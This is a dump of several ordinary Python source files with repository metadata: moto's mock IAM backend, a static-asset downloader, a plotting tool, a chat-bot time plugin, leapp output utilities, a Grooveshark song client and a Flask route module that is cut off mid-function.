Dataset schema (the records below are source files rendered one after another):

| column | dtype | values |
|---|---|---|
| repo_name | string | lengths 6-61 |
| path | string | lengths 4-230 |
| copies | string | lengths 1-3 |
| size | string | lengths 4-6 |
| text | string | lengths 1.01k-850k |
| license | string | 15 classes |
| hash | int64 | -9,220,477,234,079,998,000 to 9,219,060,020B |
| line_mean | float64 | 11.6-96.6 |
| line_max | int64 | 32-939 |
| alpha_frac | float64 | 0.26-0.9 |
| autogenerated | bool | 1 class |
| ratio | float64 | 1.62-6.1 |
| config_test | bool | 2 classes |
| has_no_keywords | bool | 2 classes |
| few_assignments | bool | 1 class |
| repo: zonk1024/moto | path: moto/iam/models.py | copies: 3 | size: 15061 | license: apache-2.0 |

from __future__ import unicode_literals
from moto.core import BaseBackend
from .exceptions import IAMNotFoundException, IAMConflictException, IAMReportNotPresentException
from .utils import random_access_key, random_alphanumeric, random_resource_id
from datetime import datetime
import base64
class Role(object):
def __init__(self, role_id, name, assume_role_policy_document, path):
self.id = role_id
self.name = name
self.assume_role_policy_document = assume_role_policy_document
self.path = path
self.policies = {}
@classmethod
def create_from_cloudformation_json(cls, resource_name, cloudformation_json, region_name):
properties = cloudformation_json['Properties']
role = iam_backend.create_role(
role_name=resource_name,
assume_role_policy_document=properties['AssumeRolePolicyDocument'],
path=properties['Path'],
)
policies = properties.get('Policies', [])
for policy in policies:
policy_name = policy['PolicyName']
policy_json = policy['PolicyDocument']
role.put_policy(policy_name, policy_json)
return role
def put_policy(self, policy_name, policy_json):
self.policies[policy_name] = policy_json
@property
def physical_resource_id(self):
return self.id
def get_cfn_attribute(self, attribute_name):
from moto.cloudformation.exceptions import UnformattedGetAttTemplateException
if attribute_name == 'Arn':
raise NotImplementedError('"Fn::GetAtt" : [ "{0}" , "Arn" ]"')
raise UnformattedGetAttTemplateException()
class InstanceProfile(object):
def __init__(self, instance_profile_id, name, path, roles):
self.id = instance_profile_id
self.name = name
self.path = path
self.roles = roles if roles else []
@classmethod
def create_from_cloudformation_json(cls, resource_name, cloudformation_json, region_name):
properties = cloudformation_json['Properties']
role_ids = properties['Roles']
return iam_backend.create_instance_profile(
name=resource_name,
path=properties['Path'],
role_ids=role_ids,
)
@property
def physical_resource_id(self):
return self.name
def get_cfn_attribute(self, attribute_name):
from moto.cloudformation.exceptions import UnformattedGetAttTemplateException
if attribute_name == 'Arn':
raise NotImplementedError('"Fn::GetAtt" : [ "{0}" , "Arn" ]"')
raise UnformattedGetAttTemplateException()
class Certificate(object):
def __init__(self, cert_name, cert_body, private_key, cert_chain=None, path=None):
self.cert_name = cert_name
self.cert_body = cert_body
self.private_key = private_key
self.path = path
self.cert_chain = cert_chain
@property
def physical_resource_id(self):
return self.cert_name  # fixed: the class stores cert_name; a bare `name` attribute is never set
class AccessKey(object):
def __init__(self, user_name):
self.user_name = user_name
self.access_key_id = random_access_key()
self.secret_access_key = random_alphanumeric(32)
self.status = 'Active'
self.create_date = datetime.strftime(
datetime.utcnow(),
"%Y-%m-%d-%H-%M-%S"
)
def get_cfn_attribute(self, attribute_name):
from moto.cloudformation.exceptions import UnformattedGetAttTemplateException
if attribute_name == 'SecretAccessKey':
return self.secret_access_key
raise UnformattedGetAttTemplateException()
class Group(object):
def __init__(self, name, path='/'):
self.name = name
self.id = random_resource_id()
self.path = path
self.created = datetime.strftime(
datetime.utcnow(),
"%Y-%m-%d-%H-%M-%S"
)
self.users = []
def get_cfn_attribute(self, attribute_name):
from moto.cloudformation.exceptions import UnformattedGetAttTemplateException
if attribute_name == 'Arn':
raise NotImplementedError('"Fn::GetAtt" : [ "{0}" , "Arn" ]"')
raise UnformattedGetAttTemplateException()
class User(object):
def __init__(self, name, path='/'):
self.name = name
self.id = random_resource_id()
self.path = path
self.created = datetime.strftime(
datetime.utcnow(),
"%Y-%m-%d-%H-%M-%S"
)
self.arn = 'arn:aws:iam::123456789012:user/{0}'.format(name)
self.policies = {}
self.access_keys = []
self.password = None
def get_policy(self, policy_name):
policy_json = None
try:
policy_json = self.policies[policy_name]
except KeyError:
raise IAMNotFoundException("Policy {0} not found".format(policy_name))
return {
'policy_name': policy_name,
'policy_document': policy_json,
'user_name': self.name,
}
def put_policy(self, policy_name, policy_json):
self.policies[policy_name] = policy_json
def delete_policy(self, policy_name):
if policy_name not in self.policies:
raise IAMNotFoundException("Policy {0} not found".format(policy_name))
del self.policies[policy_name]
def create_access_key(self):
access_key = AccessKey(self.name)
self.access_keys.append(access_key)
return access_key
def get_all_access_keys(self):
return self.access_keys
def delete_access_key(self, access_key_id):
for key in self.access_keys:
if key.access_key_id == access_key_id:
self.access_keys.remove(key)
break
else:
raise IAMNotFoundException("Key {0} not found".format(access_key_id))
def get_cfn_attribute(self, attribute_name):
from moto.cloudformation.exceptions import UnformattedGetAttTemplateException
if attribute_name == 'Arn':
raise NotImplementedError('"Fn::GetAtt" : [ "{0}" , "Arn" ]"')
raise UnformattedGetAttTemplateException()
def to_csv(self):
date_format = '%Y-%m-%dT%H:%M:%S+00:00'
date_created = datetime.strptime(self.created, '%Y-%m-%d-%H-%M-%S')
# aagrawal,arn:aws:iam::509284790694:user/aagrawal,2014-09-01T22:28:48+00:00,true,2014-11-12T23:36:49+00:00,2014-09-03T18:59:00+00:00,N/A,false,true,2014-09-01T22:28:48+00:00,false,N/A,false,N/A,false,N/A
if not self.password:
password_enabled = 'false'
password_last_used = 'not_supported'
else:
password_enabled = 'true'
password_last_used = 'no_information'
if len(self.access_keys) == 0:
access_key_1_active = 'false'
access_key_1_last_rotated = 'N/A'
access_key_2_active = 'false'
access_key_2_last_rotated = 'N/A'
elif len(self.access_keys) == 1:
access_key_1_active = 'true'
access_key_1_last_rotated = date_created.strftime(date_format)
access_key_2_active = 'false'
access_key_2_last_rotated = 'N/A'
else:
access_key_1_active = 'true'
access_key_1_last_rotated = date_created.strftime(date_format)
access_key_2_active = 'true'
access_key_2_last_rotated = date_created.strftime(date_format)
return '{0},{1},{2},{3},{4},{5},not_supported,false,{6},{7},{8},{9},false,N/A,false,N/A'.format(self.name,
self.arn,
date_created.strftime(date_format),
password_enabled,
password_last_used,
date_created.strftime(date_format),
access_key_1_active,
access_key_1_last_rotated,
access_key_2_active,
access_key_2_last_rotated
)
class IAMBackend(BaseBackend):
def __init__(self):
self.instance_profiles = {}
self.roles = {}
self.certificates = {}
self.groups = {}
self.users = {}
self.credential_report = None
super(IAMBackend, self).__init__()
def create_role(self, role_name, assume_role_policy_document, path):
role_id = random_resource_id()
role = Role(role_id, role_name, assume_role_policy_document, path)
self.roles[role_id] = role
return role
def get_role_by_id(self, role_id):
return self.roles.get(role_id)
def get_role(self, role_name):
for role in self.get_roles():
if role.name == role_name:
return role
raise IAMNotFoundException("Role {0} not found".format(role_name))
def get_roles(self):
return self.roles.values()
def put_role_policy(self, role_name, policy_name, policy_json):
role = self.get_role(role_name)
role.put_policy(policy_name, policy_json)
def get_role_policy(self, role_name, policy_name):
role = self.get_role(role_name)
for p, d in role.policies.items():
if p == policy_name:
return p, d
def list_role_policies(self, role_name):
role = self.get_role(role_name)
return role.policies.keys()
def create_instance_profile(self, name, path, role_ids):
instance_profile_id = random_resource_id()
roles = [iam_backend.get_role_by_id(role_id) for role_id in role_ids]
instance_profile = InstanceProfile(instance_profile_id, name, path, roles)
self.instance_profiles[instance_profile_id] = instance_profile
return instance_profile
def get_instance_profile(self, profile_name):
for profile in self.get_instance_profiles():
if profile.name == profile_name:
return profile
def get_instance_profiles(self):
return self.instance_profiles.values()
def get_instance_profiles_for_role(self, role_name):
found_profiles = []
for profile in self.get_instance_profiles():
if len(profile.roles) > 0:
if profile.roles[0].name == role_name:
found_profiles.append(profile)
return found_profiles
def add_role_to_instance_profile(self, profile_name, role_name):
profile = self.get_instance_profile(profile_name)
role = self.get_role(role_name)
profile.roles.append(role)
def get_all_server_certs(self, marker=None):
return self.certificates.values()
def upload_server_cert(self, cert_name, cert_body, private_key, cert_chain=None, path=None):
certificate_id = random_resource_id()
cert = Certificate(cert_name, cert_body, private_key, cert_chain, path)
self.certificates[certificate_id] = cert
return cert
def get_server_certificate(self, name):
for key, cert in self.certificates.items():
if name == cert.cert_name:
return cert
def create_group(self, group_name, path='/'):
if group_name in self.groups:
raise IAMConflictException("Group {0} already exists".format(group_name))
group = Group(group_name, path)
self.groups[group_name] = group
return group
def get_group(self, group_name, marker=None, max_items=None):
group = None
try:
group = self.groups[group_name]
except KeyError:
raise IAMNotFoundException("Group {0} not found".format(group_name))
return group
def list_groups(self):
return self.groups.values()
def get_groups_for_user(self, user_name):
user = self.get_user(user_name)
groups = []
for group in self.list_groups():
if user in group.users:
groups.append(group)
return groups
def create_user(self, user_name, path='/'):
if user_name in self.users:
raise IAMConflictException("EntityAlreadyExists", "User {0} already exists".format(user_name))
user = User(user_name, path)
self.users[user_name] = user
return user
def get_user(self, user_name):
user = None
try:
user = self.users[user_name]
except KeyError:
raise IAMNotFoundException("User {0} not found".format(user_name))
return user
def create_login_profile(self, user_name, password):
# This does not currently deal with PasswordPolicyViolation.
user = self.get_user(user_name)
if user.password:
raise IAMConflictException("User {0} already has password".format(user_name))
user.password = password
def add_user_to_group(self, group_name, user_name):
user = self.get_user(user_name)
group = self.get_group(group_name)
group.users.append(user)
def remove_user_from_group(self, group_name, user_name):
group = self.get_group(group_name)
user = self.get_user(user_name)
try:
group.users.remove(user)
except ValueError:
raise IAMNotFoundException("User {0} not in group {1}".format(user_name, group_name))
def get_user_policy(self, user_name, policy_name):
user = self.get_user(user_name)
policy = user.get_policy(policy_name)
return policy
def put_user_policy(self, user_name, policy_name, policy_json):
user = self.get_user(user_name)
user.put_policy(policy_name, policy_json)
def delete_user_policy(self, user_name, policy_name):
user = self.get_user(user_name)
user.delete_policy(policy_name)
def create_access_key(self, user_name=None):
user = self.get_user(user_name)
key = user.create_access_key()
return key
def get_all_access_keys(self, user_name, marker=None, max_items=None):
user = self.get_user(user_name)
keys = user.get_all_access_keys()
return keys
def delete_access_key(self, access_key_id, user_name):
user = self.get_user(user_name)
user.delete_access_key(access_key_id)
def delete_user(self, user_name):
try:
del self.users[user_name]
except KeyError:
raise IAMNotFoundException("User {0} not found".format(user_name))
def report_generated(self):
return self.credential_report
def generate_report(self):
self.credential_report = True
def get_credential_report(self):
if not self.credential_report:
raise IAMReportNotPresentException("Credential report not present")
report = 'user,arn,user_creation_time,password_enabled,password_last_used,password_last_changed,password_next_rotation,mfa_active,access_key_1_active,access_key_1_last_rotated,access_key_2_active,access_key_2_last_rotated,cert_1_active,cert_1_last_rotated,cert_2_active,cert_2_last_rotated\n'
for user in self.users:
report += self.users[user].to_csv()
return base64.b64encode(report.encode('ascii')).decode('ascii')
iam_backend = IAMBackend()
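# --- Editor's usage sketch (not part of the original module): a minimal,
# hypothetical smoke test of the in-memory backend above. All names and
# values here are invented; only the method signatures come from the code.
if __name__ == '__main__':
    backend = IAMBackend()
    role = backend.create_role('demo-role', '{"Statement": []}', '/')
    backend.put_role_policy('demo-role', 'demo-policy', '{"Action": "*"}')
    user = backend.create_user('alice')
    key = backend.create_access_key('alice')
    backend.generate_report()
    print('{0} {1} {2}'.format(role.id, user.arn, key.access_key_id))
    print(len(backend.get_credential_report()))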
| repo: ulikoehler/Translatron | path: download-assets.py | copies: 1 | size: 3048 | license: apache-2.0 |

#!/usr/bin/env python3
"""
Downloads assets to the static directory.
This is used to allow easier updating without having to clog the git repository
with frequently updated minified JS/CSS
"""
import urllib.request
import os
import sys
from ansicolor import black, red
from collections import namedtuple
Asset = namedtuple("Asset", ["filename", "url"])
assets = [
#Bootstrap
Asset("css/bootstrap.min.css", "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/css/bootstrap.min.css"),
Asset("js/bootstrap.min.js", "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/js/bootstrap.min.js"),
Asset("fonts/glyphicons-halflings-regular.eot", "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/fonts/glyphicons-halflings-regular.eot"),
Asset("fonts/glyphicons-halflings-regular.svg", "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/fonts/glyphicons-halflings-regular.svg"),
Asset("fonts/glyphicons-halflings-regular.ttf", "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/fonts/glyphicons-halflings-regular.ttf"),
Asset("fonts/glyphicons-halflings-regular.woff", "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/fonts/glyphicons-halflings-regular.woff"),
Asset("fonts/glyphicons-halflings-regular.woff2", "https://maxcdn.bootstrapcdn.com/bootstrap/3.3.2/fonts/glyphicons-halflings-regular.woff2"),
#Angular
Asset("js/angular.min.js", "https://ajax.googleapis.com/ajax/libs/angularjs/1.3.13/angular.min.js"),
#Angular Bootstrap directives
Asset("js/angular-bootstrap.min.js", "https://angular-ui.github.io/bootstrap/ui-bootstrap-tpls-0.12.0.min.js"),
#JQuery & plugins
Asset("js/jquery.min.js", "https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"),
Asset("js/jquery.highlight.js", "https://raw.githubusercontent.com/bartaz/sandbox.js/master/jquery.highlight.js"),
]
def ensureFileIsPresent(asset, directory, forceDownload=False):
(filename, url) = asset
filepath = os.path.join(directory, filename)
if url is None: # --> no need to download
return
if not os.path.isfile(filepath) or forceDownload:
#Create directory if required
dirname = os.path.dirname(filepath)
if not os.path.exists(dirname):
os.makedirs(dirname)
#Perform download
print (black("Downloading %s" % filename, bold=True))
urllib.request.urlretrieve(url, filepath)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-f", "--force-download", action="store_true", help="Force downloading assets")
parser.add_argument("-d", "--directory", default="./static", help="Directory to download (must exist)")
args = parser.parse_args()
#Check if the --directory arg is valid
if not os.path.isdir(args.directory):
print(red("%s is not a directory" % args.directory, bold=True))
sys.exit(1)
#Create subdirectories as needed, then download each file that is
#missing (or every file, when --force-download is given)
for asset in assets:
ensureFileIsPresent(asset, args.directory, args.force_download)
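# --- Editor's sketch (not in the original script): the same download loop as a
# reusable helper, for driving it programmatically. The default directory is
# illustrative; only ensureFileIsPresent and assets above are real.
def download_all(directory="./static", force=False):
    for asset in assets:
        ensureFileIsPresent(asset, directory, forceDownload=force)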
| repo: vmr2117/nnet | path: src/neural_network/perf_graph.py | copies: 1 | size: 1173 | license: gpl-2.0 |

import argparse
from database import DatabaseAccessor
from data_structures import Perf
from pylab import *
def graph(db_file, filename, ttl):
db = DatabaseAccessor(Perf, db_file)
perf_data = db.read()
save_fig(perf_data, filename, ttl)
def save_fig(perf_data, filename, ttl):
iters = range(len(perf_data)) # number of epochs
tr_errs = [ entry[1] for entry in perf_data]
vd_errs = [ entry[2] for entry in perf_data]
plot(iters, tr_errs, 'g', label = 'Training Error')
plot(iters, vd_errs, 'r', label = 'Validation Error')
legend()
xlabel('Epoch')
ylabel('Error')
title(ttl)
grid(True)
savefig(filename)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Tool to graph the validation \
and training error collected during training phase')
parser.add_argument('database_file', help='the database file that contains \
data')
parser.add_argument('figure_file', help='graph of the data')
parser.add_argument('title', help='graph title')
args = parser.parse_args()
graph(args.database_file, args.figure_file, args.title)
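# --- Editor's sketch (not in the original script): save_fig() only needs rows
# shaped like (label, training_error, validation_error), so it can be exercised
# without a database; the synthetic values and file name below are invented.
def demo_plot():
    fake_perf = [(i, 1.0 / (i + 1), 1.2 / (i + 1)) for i in range(10)]
    save_fig(fake_perf, 'demo.png', 'Synthetic training/validation errors')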
| repo: vk-brain/sketal | path: plugins/miscellaneous/misc_show_time.py | copies: 2 | size: 1267 | license: mit |

from handler.base_plugin import CommandPlugin
import datetime
class TimePlugin(CommandPlugin):
__slots__ = ("delta", "message", "days")
def __init__(self, *commands, prefixes=None, strict=False, offseth=3, offsetm=0, message=None):
"""Answers with current date and time."""
if not commands:
commands = ("время",)
super().__init__(*commands, prefixes=prefixes, strict=strict)
self.message = message or "Текущие дата и время по МСК:"
self.delta = datetime.timedelta(hours=offseth, minutes=offsetm)
self.days = {0: 'понедельник', 1: 'вторник', 2: 'среда', 3: 'четверг',
4: 'пятница', 5: 'суббота', 6: 'воскресенье'}
example = self.command_example()
self.description = [f"Текущее время",
f"{example} - показывает текущее время и дату."]
async def process_message(self, msg):
time = (datetime.datetime.now(datetime.timezone.utc) + self.delta)
timestr = time.strftime('%d-%m-%Y %H:%M:%S')
await msg.answer(f'{self.message}\n{timestr}\nСегодня {self.days[time.weekday()]}.')
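# --- Editor's sketch (not in the original plugin): a hedged construction
# example. The command names and offset are illustrative, and how the
# surrounding bot framework loads the returned plugin is assumed, not shown.
def make_time_plugin():
    return TimePlugin("время", "time", offseth=3,
                      message="Текущие дата и время по МСК:")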
| repo: leapp-to/prototype | path: leapp/utils/output.py | copies: 1 | size: 6732 | license: lgpl-2.1 |

from __future__ import print_function
import hashlib
import json
import os
import sys
from contextlib import contextmanager
from leapp.exceptions import LeappRuntimeError
from leapp.models import ErrorModel
from leapp.utils.audit import get_audit_entry
def _is_verbose():
"""Redefinition of is_verbose from leapp.libraries.stdlib.config because it leads to import errors"""
return os.getenv('LEAPP_VERBOSE', '0') == '1'
class Color(object):
reset = "\033[0m" if sys.stdout.isatty() else ""
bold = "\033[1m" if sys.stdout.isatty() else ""
red = "\033[1;31m" if sys.stdout.isatty() else ""
green = "\033[1;32m" if sys.stdout.isatty() else ""
yellow = "\033[1;33m" if sys.stdout.isatty() else ""
def pretty_block_text(string, color=Color.bold, width=60):
return "\n{color}{separator}\n{text}\n{separator}{reset}\n".format(
color=color,
separator="=" * width,
reset=Color.reset,
text=string.center(width))
@contextmanager
def pretty_block(text, target, end_text=None, color=Color.bold, width=60):
target.write(pretty_block_text(text, color=color, width=width))
target.write('\n')
yield
target.write(pretty_block_text(end_text or 'END OF {}'.format(text), color=color, width=width))
target.write('\n')
def print_error(error):
model = ErrorModel.create(json.loads(error['message']['data']))
sys.stdout.write("{red}{time} [{severity}]{reset} Actor: {actor}\nMessage: {message}\n".format(
red=Color.red, reset=Color.reset, severity=model.severity.upper(),
message=model.message, time=model.time, actor=model.actor))
if model.details:
print('Summary:')
details = json.loads(model.details)
for detail in details:
print(' {k}: {v}'.format(
k=detail.capitalize(),
v=details[detail].rstrip().replace('\n', '\n' + ' ' * (6 + len(detail)))))
def report_inhibitors(context_id):
# The following imports are required to be here to avoid import loop problems
from leapp.reporting import Flags # pylint: disable=import-outside-toplevel
from leapp.utils.report import fetch_upgrade_report_messages # pylint: disable=import-outside-toplevel
reports = fetch_upgrade_report_messages(context_id)
inhibitors = [report for report in reports if Flags.INHIBITOR in report.get('flags', [])]
if inhibitors:
text = 'UPGRADE INHIBITED'
with pretty_block(text=text, end_text=text, color=Color.red, target=sys.stdout):
print('Upgrade has been inhibited due to the following problems:')
for position, report in enumerate(inhibitors, start=1):
print('{idx:5}. Inhibitor: {title}'.format(idx=position, title=report['title']))
print('Consult the pre-upgrade report for details and possible remediation.')
def report_deprecations(context_id, start=None):
deprecations = get_audit_entry(event='deprecation', context=context_id)
if start:
start_stamp = start.isoformat() + 'Z'
deprecations = [d for d in deprecations if d['stamp'] > start_stamp]
if deprecations:
cache = set()
with pretty_block("USE OF DEPRECATED ENTITIES", target=sys.stderr, color=Color.red):
for deprecation in deprecations:
entry_data = json.loads(deprecation['data'])
# Deduplicate messages
key = hashlib.sha256(json.dumps(entry_data, sort_keys=True).encode('utf-8')).hexdigest()  # encode: sha256 requires bytes on Python 3
if key in cache:
continue
# Add current message to the cache
cache.add(key)
# Print the message
sys.stderr.write(
'{message} @ {filename}:{lineno}\nNear: {line}\nReason: {reason}\n{separator}\n'.format(
separator='-' * 60, **entry_data)
)
def report_errors(errors):
if errors:
with pretty_block("ERRORS", target=sys.stdout, color=Color.red):
for error in errors:
print_error(error)
def report_info(report_paths, log_paths, answerfile=None, fail=False):
report_paths = [report_paths] if not isinstance(report_paths, list) else report_paths
log_paths = [log_paths] if not isinstance(log_paths, list) else log_paths
if log_paths:
sys.stdout.write("\n")
for log_path in log_paths:
sys.stdout.write("Debug output written to {path}\n".format(path=log_path))
if report_paths:
with pretty_block("REPORT", target=sys.stdout, color=Color.bold if fail else Color.green):
for report_path in report_paths:
sys.stdout.write("A report has been generated at {path}\n".format(path=report_path))
if answerfile:
sys.stdout.write("Answerfile has been generated at {}\n".format(answerfile))
def report_unsupported(devel_vars, experimental):
text = "UNSUPPORTED UPGRADE"
with pretty_block(text=text, end_text=text, target=sys.stdout, color=Color.yellow):
sys.stdout.write("Variable LEAPP_UNSUPPORTED has been detected. Proceeding at your own risk.\n")
if devel_vars:
sys.stdout.write("{yellow}Development variables{reset} have been detected:\n".format(
yellow=Color.yellow, reset=Color.reset))
for key in devel_vars:
sys.stdout.write("- {key}={value}\n".format(key=key, value=devel_vars[key]))
if experimental:
sys.stdout.write("{yellow}Experimental actors{reset} have been detected:\n".format(
yellow=Color.yellow, reset=Color.reset))
for actor in experimental:
sys.stdout.write("- {actor}\n".format(actor=actor))
@contextmanager
def beautify_actor_exception():
try:
try:
yield
except LeappRuntimeError as e:
msg = '{} - Please check the above details'.format(e.message)
sys.stderr.write("\n")
sys.stderr.write(pretty_block_text(msg, color="", width=len(msg)))
finally:
pass
def display_status_current_phase(phase):
if not _is_verbose():
print('==> Processing phase `{name}`'.format(name=phase[0].name))
def _get_description_title(actor):
lines = actor.description.strip().split('\n')
return lines[0].strip() if lines else actor.name
def display_status_current_actor(actor, designation=''):
if not _is_verbose():
print('====> * {actor}{designation}\n {title}'.format(actor=actor.name,
title=_get_description_title(actor),
designation=designation))
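# --- Editor's sketch (not in the original module): a tiny demonstration of the
# pretty_block() context manager above; the block title and body are invented.
def _demo_block():
    with pretty_block("DEMO", target=sys.stdout, color=Color.green):
        sys.stdout.write("body text\n")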
| repo: hedgehogarray/shared_playlist | path: pygrooveshark/build/lib.linux-i686-2.7/grooveshark/classes/song.py | copies: 4 | size: 8810 | license: mit |

# -*- coding:utf-8 -*-
#
# Copyright (C) 2012, Maximilian Köhl <linuxmaxi@googlemail.com>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import threading
from grooveshark.const import *
class Song(object):
"""
Represents a song.
Do not use this class directly.
:param id: internal song id
:param name: name
:param artist_id: artist's id to generate an :class:`Artist` object
:param artist_name: artist's name to generate an :class:`Artist` object
:param album_id: album's id to generate an :class:`Album` object
:param album_name: album's name to generate an :class:`Album` object
:param cover_url: album's cover to generate an :class:`Album` object
:param track: track number
:param duration: estimated song duration
:param popularity: popularity
:param connection: underlying :class:`Connection` object
"""
def __init__(self, id, name, artist_id, artist_name, album_id, album_name, cover_url, track, duration, popularity, connection):
self._connection = connection
self._id = id
self._name = name
self._artist_id = artist_id
self._artist_name = artist_name
self._album_id = album_id
self._album_name = album_name
self._cover_url = cover_url
if not self._cover_url:
self._cover_url = NO_COVER_URL
self._track = track
self._duration = duration
self._popularity = popularity
self._artist = None
self._album = None
def __str__(self):
return '%s - %s - %s' % (self.name, self.artist.name, self.album.name)
@classmethod
def from_response(cls, song, connection):
return cls(song['SongID'], song['Name'] if 'Name' in song else song['SongName'], song['ArtistID'], song['ArtistName'], song['AlbumID'], song['AlbumName'],
ALBUM_COVER_URL + song['CoverArtFilename'] if song['CoverArtFilename'] else None, song['TrackNum'], song['EstimateDuration'], song['Popularity'], connection)
@classmethod
def from_export(cls, export, connection):
return cls(export['id'], export['name'], export['artist_id'], export['artist'], export['album_id'], export['album'], export['cover'],
export['track'], export['duration'], export['popularity'], connection)
@property
def id(self):
"""
internal song id
"""
return self._id
@property
def name(self):
"""
song name
"""
return self._name
@property
def artist(self):
"""
artist as :class:`Artist` object
"""
if not self._artist:
self._artist = Artist(self._artist_id, self._artist_name, self._connection)
return self._artist
@property
def album(self):
"""
album as :class:`Album` object
"""
if not self._album:
self._album = Album(self._album_id, self._album_name, self._artist_id, self._artist_name, self._cover_url, self._connection)
return self._album
@property
def track(self):
"""
track number
"""
return self._track
@property
def duration(self):
"""
estimated song duration
"""
return self._duration
@property
def popularity(self):
"""
popularity
"""
return self._popularity
@property
def stream(self):
"""
:class:`Stream` object for playing
"""
# Add song to queue
self._connection.request('addSongsToQueue',
{'songIDsArtistIDs': [{'artistID': self.artist.id,
'source': 'user',
'songID': self.id,
'songQueueSongID': 1}],
'songQueueID': self._connection.session.queue},
self._connection.header('addSongsToQueue', 'jsqueue'))
stream_info = self._connection.request('getStreamKeyFromSongIDEx', {'songID' : self.id, 'country' : self._connection.session.country,
'prefetch' : False, 'mobile' : False},
self._connection.header('getStreamKeyFromSongIDEx', 'jsqueue'))[1]
return Stream(stream_info['ip'], stream_info['streamKey'], self._connection)
def export(self):
"""
Returns a dictionary with all song information.
Use the :meth:`from_export` method to recreate the
:class:`Song` object.
"""
return {'id' : self.id, 'name' : self.name, 'artist' : self._artist_name, 'artist_id' : self._artist_id,
'album' : self._album_name, 'album_id' : self._album_id, 'track' : self.track,
'duration' : self.duration, 'popularity' : self.popularity, 'cover' : self._cover_url}
def format(self, pattern):
"""
Format the song according to certain patterns:
%a: artist title
%s: song title
%A: album title
"""
pattern = pattern.replace('%a', self.artist.name)
pattern = pattern.replace('%s', self.name)
pattern = pattern.replace('%A', self.album.name)
return pattern.replace('/', '').replace('\\', '')
def download(self, directory='~/Music', song_name='%a - %s - %A'):
"""
Download a song to a directory.
:param directory: A system file path.
:param song_name: A name that will be formatted with :meth:`format`.
:return: The formatted song name.
"""
formatted = self.format(song_name)
path = os.path.expanduser(directory) + os.path.sep + formatted + '.mp3'
try:
raw = self.safe_download()
with open(path, 'wb') as f:
f.write(raw)
except:
raise
return formatted
def safe_download(self):
"""Download a song respecting Grooveshark's API.
:return: The raw song data.
"""
def _markStreamKeyOver30Seconds(stream):
self._connection.request('markStreamKeyOver30Seconds',
{'streamServerID': stream.ip,
'artistID': self.artist.id,
'songQueueID': self._connection.session.queue,
'songID': self.id,
'songQueueSongID': 1,
'streamKey': stream.key},
self._connection.header('markStreamKeyOver30Seconds',
'jsqueue'))
stream = self.stream
timer = threading.Timer(30, _markStreamKeyOver30Seconds, [stream])
timer.start()
raw = stream.data.read()
if len(raw) == stream.size:
timer.cancel()
self._connection.request('markSongDownloadedEx',
{'streamServerID': stream.ip,
'songID': self.id,
'streamKey': stream.key},
self._connection.header('markSongDownloadedEx',
'jsqueue'))
self._connection.request('removeSongsFromQueue',
{'userRemoved':True,
'songQueueID': self._connection.session.queue,
'songQueueSongIDs': [1]},
self._connection.header('removeSongsFromQueue',
'jsqueue'))
return raw
else:
raise ValueError("Content-Length {}, but read {}"
.format(stream.size, len(raw)))
from grooveshark.classes.artist import Artist
from grooveshark.classes.album import Album
from grooveshark.classes.stream import Stream
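# --- Editor's sketch (not in the original module): export()/from_export() form
# a round trip, which is handy for caching song metadata. The `connection` and
# `song_dict` arguments are placeholders; song_dict must carry the Grooveshark
# response keys that from_response() reads (SongID, Name, ArtistID, ...).
def demo_export_roundtrip(connection, song_dict):
    song = Song.from_response(song_dict, connection)
    restored = Song.from_export(song.export(), connection)
    return restored.name == song.name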
| repo: NewBeeStudio/xichao-new | path: xichao/packages/route/special.py | copies: 1 | size: 17428 | license: apache-2.0 |

# -*- coding: utf-8 -*-
from imports import *
################################## Special column pages ##################################
# Special column list page
@app.route('/special_all', methods=['GET'])
def special_all():
try:
view = request.args.get('view')
sort = request.args.get('sort')
page_id = int(request.args.get('page'))
except Exception:
abort(404)
if sort != 'favor':
sort = 'time'
sort_change_url = '/special_all?view=%s&sort=favor&page=1'%(view)
else:
sort_change_url = '/special_all?view=%s&sort=time&page=1'%(view)
if view != 'list':
view = 'all'
view_change_url = '/special_all?view=list&sort=%s&page=1'%(sort)
else:
view_change_url = '/special_all?view=all&sort=%s&page=1'%(sort)
if view == 'list': # list view
specials_pagination = get_all_specials(sort, page_id, 5)
return render_template('special_all_listView.html', sort = sort, view=view,
specials_pagination_list = specials_pagination,
author = get_special_author,
articles = get_special_article,
sort_change_url = sort_change_url,
view_change_url = view_change_url)
else: # all view
specials_pagination = get_all_specials(sort, page_id, 12)
return render_template('special_all_allView.html', sort = sort, view=view,
specials_pagination_all = specials_pagination,
author = get_special_author,
articles = get_special_article,
sort_change_url = sort_change_url,
view_change_url = view_change_url)
# Special column list search
@app.route('/special_search', methods=['GET'])
def special_search():
try:
search = request.args.get('search')
if search == '': abort(404)
except Exception:
abort(404)
specials_pagination = get_search_specials(search)
return render_template('special_search.html', specials_pagination = specials_pagination,
author = get_special_author)
# Special column detail page
@app.route('/special', methods=['GET'])
def special():
#URL pattern: http://127.0.0.1:5000/special?id=2&page=1&sort=time
try:
special_id = int(request.args.get('id'))
page_id = int(request.args.get('page'))
sort = request.args.get('sort')
except Exception:
abort(404)
#Only two sort orders are supported: favor and time
if (sort != 'favor'):
sort = 'time'
sort_change_url = "/special?id=%d&page=1&sort=favor" % (special_id)
else:
sort_change_url = "/special?id=%d&page=1&sort=time" % (special_id)
special = get_special_information(special_id)
if (special == None):
abort(404)
author = get_special_author(special.special_id)
#Pagination object for articles; articles_pagination.items returns the page's contents as a list
login_user = get_userid_from_session()
articles_pagination = get_special_article(special_id, page_id, sort, 5)
related_other_special = get_related_special(special.special_id)
is_mobile = is_small_mobile_device(request)
if is_mobile:
return render_template('mobile_special_detail.html',
login_user_id = login_user,
is_mobile = is_mobile,
